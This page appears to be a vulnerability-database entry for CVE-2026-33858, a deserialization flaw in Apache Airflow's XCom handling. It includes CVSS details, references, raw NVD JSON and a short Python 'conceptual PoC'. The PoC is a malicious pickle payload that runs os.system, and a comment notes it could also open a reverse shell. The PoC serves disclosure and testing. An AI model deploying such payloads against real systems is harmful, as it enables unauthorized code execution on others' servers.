CVE-2026-33858

Description

Dag Authors, who normally should not be able to execute code in the webserver context could craft XCom payload causing the webserver to execute arbitrary code. Since Dag Authors are already highly trusted, severity of this issue is Low. Users are recommended to upgrade to Apache Airflow 3.2.0, which resolves this issue.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* - VULNERABLE

Apache Airflow < 3.2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Conceptual PoC for CVE-2026-33858
# This script demonstrates how a malicious DAG author might craft an XCom payload.
# Note: Actual exploitation depends on specific deserialization mechanisms in Airflow.

import pickle
import os

class MaliciousPayload:
    def __reduce__(self):
        # Command to execute (e.g., create a file or reverse shell)
        return (os.system, ('touch /tmp/pwned', ))

# Serialize the malicious object
evil_data = pickle.dumps(MaliciousPayload())

# In a real scenario, this 'evil_data' would be pushed via xcom_push
print(f"Malicious XCom payload generated: {evil_data}")

# Example usage in a DAG (Conceptual):
# def push_malicious_xcom(**context):
#     context['task_instance'].xcom_push(key='exploit', value=evil_data)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33858
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33858
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33858/
[4] VulDB https://vuldb.com/cve/CVE-2026-33858
[5] https://github.com/apache/airflow/pull/64148
[6] https://lists.apache.org/thread/1npt3o2x81s0gw9tmfcv4n7p1z9hdmy0
[7] http://www.openwall.com/lists/oss-security/2026/04/13/7

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33858", "sourceIdentifier": "[email protected]", "published": "2026-04-13T15:17:33.343", "lastModified": "2026-04-17T18:40:56.003", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dag Authors, who normally should not be able to execute code in the webserver context could craft XCom payload causing the webserver to execute arbitrary code. Since Dag Authors are already highly trusted, severity of this issue is Low.\n\n\nUsers are recommended to upgrade to Apache Airflow 3.2.0, which resolves this issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.1.8", "versionEndExcluding": "3.2.0", "matchCriteriaId": "99AE110A-CD12-4E42-AD9A-9FDA4940E6E2"}]}]}], "references": [{"url": "https://github.com/apache/airflow/pull/64148", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://lists.apache.org/thread/1npt3o2x81s0gw9tmfcv4n7p1z9hdmy0", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/13/7", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}